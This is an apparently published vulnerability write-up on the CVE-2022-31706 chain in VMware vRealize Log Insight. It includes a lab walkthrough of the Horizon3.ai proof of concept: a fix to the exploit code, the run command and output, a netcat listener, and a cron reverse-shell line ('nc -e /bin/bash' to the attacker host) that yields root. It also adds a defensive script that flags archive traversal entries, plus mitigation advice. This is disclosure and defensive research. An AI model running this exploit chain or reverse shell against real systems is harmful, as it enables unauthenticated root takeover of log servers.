CVE-2022-31706
Description
The vRealize Log Insight contains a Directory Traversal Vulnerability. An unauthenticated, malicious actor can inject files into the operating system of an impacted appliance which can result in remote code execution.
Ratings
- Attacker Value: Very High
- Exploitability: Medium
Technical Analysis
On 31 January 2023, security researcher James Horman and team from Horizon3.ai published a Technical Deep Dive on vulnerabilities that exist in VMware vRealize Log Insight and how to exploit them to get unauthenticated remote access to the application. Please read the blog VMware vRealize Log Insight VMSA-2023-0001 Technical Deep Dive for all the technical details.
What makes this case particularly interesting is the chaining of multiple vulnerabilities to achieve the unauthenticated RCE.
Basically there are four vulnerabilities that are published in the VMware VMSA-2023-0001 security disclosure:
- CVE-2022-31706: VMware vRealize Log Insight Directory Traversal Vulnerability
- CVE-2022-31704: VMware vRealize Log Insight Broken Access Control Vulnerability
- CVE-2022-31710: VMware vRealize Log Insight Deserialization Vulnerability
- CVE-2022-31711: VMware vRealize Log Insight Information Disclosure Vulnerability
The analysis shows that three vulnerabilities, CVE-2022-31706, CVE-2022-31704 and CVE-2022-31711, are chained to achieve the RCE.
In a nutshell:
- CVE-2022-31704 is used to gain unauthorized access to the Apache Thrift server to execute commands. Apache Thrift is an RPC framework that allows client/server communication and is typically used to establish communication between components of the system.
- The Apache Thrift server in the VMware vRealize Log Insight application is vulnerable and can be accessed with a client to execute specific commands defined in the framework.
- In this scenario, two RPC commands are exploited, remotePakDownloadCommand and pakUpgradeCommand, which allow an unauthenticated upload of a malicious PAK file with an attached payload that can be extracted to any place on the filesystem using CVE-2022-31706, the Directory Traversal vulnerability.
- Last but not least, the remotePakDownloadCommand requires a node token to work. A node token is a GUID that is unique per instance of Log Insight. This information is not readily available to an unauthenticated user. However, there are various Thrift RPC commands that leak the node token, including getConfig and getHealthStatus, which links back to the third vulnerability, CVE-2022-31711 (VMware vRealize Log Insight Information Disclosure Vulnerability).
Now let's see how this vulnerability works in practice.
First we need to install a vulnerable instance of VMware vRealize Log Insight, which you can download from this link. You need to be registered as a customer, or you can apply for a trial license, before you can download the OVA.
Import the OVA in your favorite hypervisor application. I am using Oracle VirtualBox. Please allocate enough memory and CPU (minimum 4 GB and 2 vCPU); otherwise your appliance will be dead slow and the exploit will fail due to lack of space in the /tmp directory.
Go through the setup of the appliance. This is all very straightforward.
Once the appliance is running, go to the PoC on GitHub that was created by the Horizon3.ai team and clone the repository.
Before you start executing the exploit, please install Thrift Python support:
# pip3 install thrift
and install the thrift-compiler. It is not needed for the exploit to work, but it gives you the ability to generate Thrift modules for other languages such as Ruby:
# apt install thrift-compiler
The last thing that you need to do is to correct a small typo that the guys from Horizon3.ai made in their code. Yeah, everybody makes mistakes, even these guys ;–)
Open VMSA-2023-0001.py with your favorite editor and go to the section below.
def remote_pak_download(client, node_token, http_server_address, http_server_port):
    command = Command()
    command.commandType = 9
    download_command = RemotePakDownloadCommand()
    download_command.sourceNodeToken = node_token
    # The remote system does not return an error if this url is incorrect.
    # It just silently fails
    download_command.requestUrl = f"http://{http_server_address}:{http_server_port}/exploit.tar"
    download_command.fileName = "exploit.pak"
    command.remotePakDownloadCommand = download_command
Change download_command.fileName = "exploit" to download_command.fileName = "exploit.pak" (the snippet above is shown with the corrected line) and save the file.
Now we are ready to run the exploit against our installed target.
- The exploit will gain access by obtaining the token.
- Next, it will create a malicious PAK file with the payload attached, which is a crontab file with a netcat command connecting back to your system.
- The PAK file gets uploaded and extracted using the vulnerable Apache Thrift server running on the Log Insight server.
- Run a netcat listener on your system to catch the netcat connection from the target system, triggered by the cron daemon after successful exploitation.
# python3 ./VMSA-2023-0001.py --target_address 192.168.100.92 --http_server_address 192.168.100.7 --http_server_port 1981 --payload_file payload --payload_path /etc/cron.d/exploit
[+] Using CVE-2022-31711 to leak node token
[+] Found node token: 8984be67-2394-4da1-bf87-2635d558329d
[+] Using CVE-2022-31704 to trigger malicious file download
192.168.100.92 - - [03/Feb/2023 17:19:02] "GET /exploit.tar HTTP/1.1" 200 -
[+] File successfully downloaded
[+] Using CVE-2022-31706 to trigger directory traversal and write cron reverse shell
[+] Payload successfully delivered

# nc -lnvp 8888
listening on [any] 8888 ...
connect to [192.168.100.7] from (UNKNOWN) [192.168.100.92] 42746
uname -a
Linux localhost 4.19.245-1.ph3 #1-photon SMP Thu Jun 2 02:30:39 UTC 2022 x86_64 GNU/Linux
whoami
root
cat /etc/issue
VMware vRealize Log Insight
cat /etc/photon-release
VMware Photon OS 3.0
PHOTON_BUILD_NUMBER=05f9d3d8d
If you log in to the appliance, you can find exploit.pak in the /tmp directory and a cron file named exploit created in the /etc/cron.d directory. If you check the contents of the PAK file, you will see the ../../etc/cron.d/exploit member with the directory traversal.
root@localhost [ ~ ]# ls -l /tmp/*.pak
-rw-r--r-- 1 root root 122880 Feb 3 17:18 /tmp/exploit.pak
root@localhost [ ~ ]# ls -l /etc/cron.d/exploit
-rw-r--r-- 1 root root 51 Feb 3 12:24 /etc/cron.d/exploit
root@localhost [ ~ ]# cat /etc/cron.d/exploit
* * * * * root nc -e /bin/bash 192.168.100.7 8888
root@localhost [ ~ ]# tar -tvf /tmp/exploit.pak
-rw-r--r-- root/root 35768 2023-02-03 09:10 upgrade-image-8.10.2-21145187.rpm
-rw-r--r-- root/root 35768 2023-02-03 09:10 upgrade-driver
-rw-r--r-- root/root 35768 2023-02-03 09:10 eula.txt
-rw-r--r-- root/root  1926 2023-02-03 09:10 VMware-vRealize-Log-Insight.cert
-rw-r--r-- root/root  1790 2023-02-03 09:10 VMware-vRealize-Log-Insight.mf
tar: Removing leading `../../' from member names
-rw-r--r-- root/root    51 2023-02-03 12:24 ../../etc/cron.d/exploit
The example above shows that the exploit is pretty simple to weaponize and execute; however, there is a low probability of exploitation in the wild. The main reason is that VMware vRealize Log Insight is typically not exposed to the public Internet, and the Thrift RPC ports 16520 through 16580 must be reachable for the exploit to work. But from the inside it is of course a very attractive target, because it holds tons of information on the network and servers ready to be disclosed to an attacker.
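The tar listing above shows the tell-tale sign of CVE-2022-31706 inside the PAK: a member whose name climbs out of the extraction directory with ../../. As an added example (not code from this page and not part of the Horizon3.ai PoC), the Python below inspects a PAK/tar archive offline and flags members that would land outside the extraction root, which is the kind of check an upload handler or a forensic triage script can apply before anything is extracted. It goes a little beyond the page by also flagging absolute paths and symlink or hardlink members that point outside the archive, since those are the other ways an archive entry escapes its directory. The sample archive is constructed in memory; its member names mirror the listing above, but every payload is a placeholder.

```python
import io
import posixpath
import tarfile
from typing import List, Optional, Tuple


def escapes_root(path: str) -> bool:
    """True if a POSIX path, once normalised, would land outside the extraction root."""
    if path.startswith("/"):
        return True
    normalized = posixpath.normpath(path)
    return normalized == ".." or normalized.startswith("../")


def unsafe_member_reason(name: str) -> Optional[str]:
    """Return why a member name is unsafe, or None if it stays inside the root."""
    if name.startswith("/"):
        return "absolute path"
    if escapes_root(name):
        return "directory traversal"
    return None


def scan_pak(data: bytes) -> List[Tuple[str, str]]:
    """Walk every member header of a PAK (tar) archive and collect (name, reason) findings.

    Only headers are read; nothing is extracted to disk.
    """
    findings: List[Tuple[str, str]] = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar:
            reason = unsafe_member_reason(member.name)
            if reason:
                findings.append((member.name, reason))
            # A symlink target is resolved relative to the member's own directory,
            # a hard link target is an archive-relative name; either may escape.
            resolved = None
            if member.issym():
                resolved = posixpath.join(posixpath.dirname(member.name), member.linkname)
            elif member.islnk():
                resolved = member.linkname
            if resolved is not None and escapes_root(resolved):
                findings.append((member.name, f"link target escapes root ({member.linkname})"))
    return findings


def build_sample_pak() -> bytes:
    """Constructed sample archive: benign members, one traversal entry and one bad link."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        def add_file(name: str, payload: bytes) -> None:
            info = tarfile.TarInfo(name)
            info.size = len(payload)
            tar.addfile(info, io.BytesIO(payload))

        add_file("eula.txt", b"constructed placeholder text\n")
        add_file("upgrade-driver", b"#!/bin/sh\necho placeholder\n")
        # Same member name as in the page's listing; the content is a placeholder.
        add_file("../../etc/cron.d/exploit", b"# constructed placeholder, not a real cron line\n")
        link = tarfile.TarInfo("upgrade-link")  # hypothetical member name
        link.type = tarfile.SYMTYPE
        link.linkname = "/etc/passwd"
        tar.addfile(link)
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in scan_pak(build_sample_pak()):
        print(f"UNSAFE {name!r}: {reason}")
```

Run it against a real archive with scan_pak(open("/tmp/exploit.pak", "rb").read()); an empty result list means every member would stay under the extraction directory. Note that GNU tar strips the leading ../../ on extraction (the "Removing leading" line in the listing above), whereas the vulnerable PAK handler did not, which is exactly why checking the raw member names, not the post-extraction paths, matters.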
Mitigation
Please update VMware vRealize Log Insight to 8.10.2.
References
Horizon3.ai: VMware vRealize Log Insight VMSA-2023-0001 Technical Deep Dive
VMware advisory
Horizon3.ai: POC
Credits
Credit goes to the security researchers who analyzed the vulnerabilities and discovered the RCE chain.
General Information
Vendors
- vmware
Products
- vrealize log insight